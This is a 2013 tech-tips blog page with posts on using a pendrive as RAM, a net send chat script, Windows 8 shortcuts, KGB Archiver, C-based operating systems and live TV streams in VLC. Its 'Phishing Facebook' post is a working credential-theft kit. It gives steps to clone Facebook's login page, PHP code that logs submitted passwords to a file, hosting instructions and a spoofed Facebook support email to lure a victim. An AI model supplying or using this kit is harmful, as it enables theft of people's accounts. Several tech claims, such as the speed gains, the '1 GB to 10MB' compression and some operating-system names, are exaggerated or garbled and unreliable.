Sunday, July 7, 2013

Use pendrive as RAM

How to use Pendrive as RAM

For XP:

  • Insert your pen-drive. Let your PC read it.(Minimum 2 GB)
  • Click on Properties from context menu.
  • Click on Advanced tab.
  • Click on Settings under Performance.
  • Click on Advanced tab.
  • Click on Change button under Virtual memory.
  • Select your USB drive.
  • Click on custom size radio button and give the values as follows;

                      Initial Size:1020
                      Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.

Click on Set button, then click on OK.
Now you have to restart the computer. The speed of your computer will be increase


For Windows 7:



  • Plug in your pendrive-> Format with NTFS or FAT32
  • Now go to properties->Select ReadyBoost
  • Check Use this device->Choose maximum space to reserve system speed
  • Click on Apply and OK. Your readyboost PenDrive is ready Now to Use.

Here is an personal suggestion HP and Sandisk is the Best for this work so what are you waiting for.  

Chat with friends using command prompt



Chat with friends using Command Prompt !! Amazing tricks !!!! 


Getting bored of chating with friends in yahoo messenger or in gtalk, here is an alternatives to gtalk & yahoo messengers…

This trick show you to chat with your friends using command prompt in your computer !!?

To perform this tricks all u need is


  1. know your friend IP address ( whom you want to chat )
  2. command prompt
How To chat :-

  • open notepad & copy below code



             @echo off
             :A
             Cls
             echo MESSENGER
             set /p n=User:
             set /p m=Message:
             net send %n% %m%
             Pause
             Goto A

save it as “Messenger.bat”.


  •  Double click the “Messenger.bat” file that you had created now..
  •  Now command prompt will open automatically, displaying a message

                  MESSENGER
                  User:
After “User” type the IP address of the friend computer whom u want to chat..& Hit ENTER

After this, you can see…
Message:

Its time to chat with you friend using command prompt !! 
simple is’nt it…
If u like this post please mark your valuable comment below 

Windows 8 shortcuts

Windows 8:

With Windows 8 upgrades, new Windows 8 PCs and Windows 8tablets having been released at the end of October 2012, the operating system has now been in stores for half a year.
If you've landed here, chances are you'll want to know what we think of Microsoft's latest operating system. So here is our definitive verdict on the full, finished Windows 8 operating system.
By all accounts Windows 8 hasn't done fantastically well in terms of consumer reception - even leading some at Microsoft to say that the company's "Start Screen first" mentality was wide of the mark.
As well as the traditional desktop, Windows 8 also ushers in a new Start Screen. This works in the same way as the old Start Menu, although it opens full screen and is also a place you can launch and use new Windows 8-style apps - essentially full-screen, tablet-style apps.

Some Keyboard Shortcuts 4 them...

Windows key – brings up the Metro start screen. You can start typing to search for an app, just like the Win7 start menu.
Win + D – brings up the old Windows desktop.

Win + C – brings up the Charms menu, where you can search, share, and change settings.
Win + I – opens the Settings panel, where you can change settings for the current app, change volume, wireless networks, shut down, or adjust the brightness.
Win + Z – opens the App Bar for the current Metro application.
Win + H – opens the Metro Share panel.
Win + Q – brings up the Metro App Search screen.
Win + W – brings up the Metro Settings search screen.
Win + F – brings up the Metro File search screen.
Win + K – opens the Devices panel (for connecting to a projector or some other device)
Win + , (comma) – Aero Peek at the desktop.
Win + . (period) – Snaps the current Metro application to one side of the screen. (Right side)
Win + Shift + . (period) – Snaps the current Metro application to the other side of the screen. (Left side)
Win + J – switches focus between snapped Metro applications.
Win + Page Up / Down – moves the current app to the other monitor.
Win + Tab – opens the Metro application switcher menu, switches between applications.
You might notice that we didn’t show screenshots of how all these shortcut keys work, and there’s a reason for that: you need to test them out for yourself to really learn how they work.
Win+X – lunch kind of start menu, very useful

Windows Key + Print Screen saves a screenshot into your Pictures folder. It’s quite handy.

If there’s any other shortcut keys that are new to Windows 8 and we haven’t featured them, be sure to let us know in the comments.

Compress 1 GB to 10MB

KGB Archiver is free and open source software which compresses 1GB file to 10MB file.
Data compression utility of this software is based on PAQ6 algorithm which has AES-256 powerful encryption. KGB archiver works on both Windows and Linux operating system. Compression ratio of this software is very high. Due to high compression levels, time to compress a file goes high as the size of the file increases and compression ratio may vary depending on the format of the file.When a file is compressed with KGB Archiver it saves it with own extension and at the time of decompression it automatically recognizes the file format. The only limitation of KGB archiver is, decompressed file cannot be open or extract with other compression softwares. You can also choose any compression level (high, maximum, normal, low, very weak) to compress a file but the compression time will vary according to your selected compression level.


Note: If you are compressing any file with KGB archiver and sending the compressed file to your friends then he must have KBG archiver installed on his computer to decompress the file.

System Requirements:

Due to high compression ratio of KGB archiver, you need to have a decent system hardware configuration
256 MB RAM
1.5 GHz Processor

Features of KGB Archiver

Supports native .kgb files and .zip files
AES-256 Encryption
Able to create self-extracting archives.
Multilingual supports like Arabic, German, Greek, Japanese, Spanish many more.
Unicode is supported in both User Interface and File Systems.
An Explorer shell extension is available for the windows version.
Make Password protected compressed file.


Click Here To Download KGB Archiver

Phishing Facebook


I agree that the efficiency of using suck tricks like keyloggers is quite less so now I would like so introduce you to a new and one of the most efficient way of hacking called 'PHISHING' .Phishing is essentially making a FAKE page which resembles to the real login page of sites like Yahoo!, Facebook,Gmail,etc. but with a modified URL(Of-course our's) .When someone Logins in this page, the username and password is secretly stolen away and stored in our database and the person get redirected to the real login page...so he/she doesn't even get to know that he/she has been HACKED!
Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:


First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and openindex.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.



To create phish.php:
Now open notepad type following php code in it and create phish.php.

<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Note: You cannot copy the above code as i have disabled copy, paste and right click in my blog. So i am providing you all the files you need to create the fake page. You can download the files from the link below.
To download php file click here

Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use www.000webhost.com



Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and then upload the 3 files index.html, phish.php, passwords.txt in public directory.

Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file. 

Importance of C

Everybody know C programming is one of the widely used language, created by Dennis Ritchie at Bell Labs.
but do you know that

40+ Operating systems written in C programming

  1. DG/UX
  2. DDC-l
  3. OpenVMS
  4. Ultrix
  5. HP-UX
  6. Enea OSE
  7. Google Chrome OS
  8. Android
  9. HP-UX 11i
  10. z/OS
  11. AIX (Advanced Interactive Exective)
  12. OpenSolaris
  13. OS/2
  14. IBM Academic Operating System
  15. ICL VME (Virtual Machine Entertainment)
  16. MicroC/OS-III
  17. WindowsNT
  18. Windows CE
  19. Singularity Operating System
  20. RTXC Quadros
  21. OS-9
  22. Solaris
  23. UNIX
  24. Minix
  25. BSD Unix
  26. Darwin
  27. Linux
  28. OpenIndiana
  29. ReactOS
  30. Inferno
  31. MorphOS
  32. EmuTOS
  33. iOS
  34. Maemo
  35. Windows Phone
  36. iPoadLinux
  37. Rockbox
  38. eCos
  39. ThreadX
  40. Unix
  41. AmigaOS
  42. Mint (Mint is now Tos)

C is a very powerfull Language to dy we are using windows just because of C.
C language Has a very wide applications

Watch live TV in VLC media player

VLC media player  is a free and open-source cross-platform media player written by the Video LAN project. Vlc supports most of the  video and audio formats.I think that it is the best player in the world.Not only it supports many formats but also it have many features likes streaming etc.Today i'm going to show you how to watch live television on vlc player .
Yes it is possible to enjoy your favorite tv channels on this wonderful 
player !  





Steps To Watch Live Television Channels On VLC Player !
Step 1 :- Firstly open VLC Player 
Step 2 :- Then Press Ctrl + S. 
Step 3 :- Then Click On Network Tab !
Step 4:- Now copy the address of any channel you want to watch From below URL's :-
 Channel Name                                Address
Aaj Tak                                    rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp
CNBC Aawaz                            rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
CNBC TV 18                             rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
Headlines Today                        rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
NDTV 24×7                               rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
NK News                                   rtsp://94.75.250.53:554/rtplive/rknews.sdp
RAJ News                                 rtsp://94.75.250.220:1935/live/rajnews2.sdp
ETV                                         rtsp://94.75.250.53/rtplive/etv2low.sdp
Studio N                                   rtsp://94.75.250.220:1935/live/studion2
NDTV                                       rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
NDTV Profit                              rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
Times Now                                rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
SVBC                                       rtsp://94.75.250.220/rtplive/svbclow
Zoo Vision                                rtsp://stream.zoovision.com/live.sdp
B4u Music                                rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
iMusic                                      rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp
Zee Tamil                                 rtsp://121.244.145.226:554/prf1/cid_54.sdp
Zee Kannad                              rtsp://121.244.145.226:554/prf1/cid_55.sdp
Zee Bangla                               rtsp://121.244.145.226:554/prf1/cid_52.sdp
Music Box                                 rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp
Bella Tv                                    rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp
Crime                                       rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp
Mystery                                    rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp
Clubbing Tv                              rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp
Sab Tv                                     rtsp://59.162.166.216:554/SABTV_QVGA.sdp
Sony Tv                                    rtsp://59.162.166.216:554/SONYTV_QVGA.sdp
Zoom Music                              rtsp://115.248.246.156:554/ZOOM_QVGA.sdp
Fashion Tv                                rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp
Adventure                                 rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp
Horror                                       rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp
Comedy                                    rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp
Classic                                     rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp
Animal Planet                           rtsp://115.248.246.156:554/ANIMALPLANET_QVGA.sdp
Star Plus (Hd)                           rtsp://115.248.246.156:554/STARPLUS_QVGA.sdp
Star one                                   rtsp://115.248.246.156:554/STARONE_QVGA.sdp
[V] Music                                  rtsp://115.248.246.156:554/CHANNELV_QVGA.sdp
Cartoon Network                       rtsp://115.248.246.156:554/CARTOONNETWORK_QVGA.sdp
Discovery                                 rtsp://115.248.246.156:554/DISCOVERYCHANNEL_QVGA.sdp
Zee Smile                                rtsp://121.244.145.226:554/prf1/cid_58.sdp
DD National                             rtsp://115.248.246.156:554/2G/LIVE/DD_QCIF.sdp
India TV                                  rtsp://115.248.246.156:554/STARNEWS_QVGA.sdp
Star News                               rtsp://115.248.246.156:554/STARNEWS_QVGA.sdp
Zee Business                          rtsp://121.244.145.226:554/prf0/cid_45.sdp
Zing                                        rtsp://121.244.145.226:554/prf0/cid_56.sdp
Zee Tv                                    rtsp://121.244.145.226:554/prf0/cid_41.sdp
etc                                         rtsp://121.244.145.226:554/prf0/cid_62.sdp
Zee Classic                            rtsp://121.244.145.226:554/prf0/cid_57.sdp
Ten sport                               rtsp://121.244.145.226:554/prf0/cid_61.sdp
Colors Tv                               rtsp://79.125.95.101/rtpencoder/zenga003.sdp
UTV Movies                           rtsp://79.125.95.101/broadcast/utvact.rm
NDTV –                                 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
NDTV Profit –                        rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
Times Now –                          rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
CNBC Aawaz –                      tsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
CNBC TV 18 –                       rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
Headlines Today –                 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
NDTV 24×7 –                        rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
NK News –                        rtsp://94.75.250.53:554/rtplive/rknews.sdp
RAJ News –                        rtsp://94.75.250.220:1935/live/rajnews2.sdp
ETV –                        rtsp://94.75.250.53/rtplive/etv2low.sdp
Studio N –                        rtsp://94.75.250.220:1935/live/studion2
SVBC –                        rtsp://94.75.250.220/rtplive/svbclow
Zoo Vision –                        rtsp://stream.zoovision.com/live.sdp
B4u Music –                        rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
iMusic –                        rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp
Zee Tamil –                        rtsp://121.244.145.226:554/prf1/cid_54.sdp
Zee Kannad –                        rtsp://121.244.145.226:554/prf1/cid_55.sdp
Zee Bangla –                        rtsp://121.244.145.226:554/prf1/cid_52.sdp
Music Box –                        rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp
Bella Tv –                        rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp
Fashion Tv –                        rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp
Adventure –                        rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp
Horror –                        rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp
Comedy –                        rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp
Classic –                        rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp
Crime –                        rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp
Mystery –                        rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp
Clubbing Tv –                        rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp
Step 5 :- Then the paste it in the "Network URL" Box and then click on Play option from the drop down list next to stream option
:) Enjoy ! 
But unfortunately i have blocked copying from my blog so click on the links then it will be opened in anoter tab of ur browser then copy the url and paste it in the field present in Network tab
Note T.V Channel Requires great speed so that it can play live !.So you can face problems while watching it on slow net :)
So By Using Some URL's We Can stream T.V. Channels On VLC Player! And Id You face any problem in any step ,you can ask me freely in comment box and i will try to reply you as soon as possible :)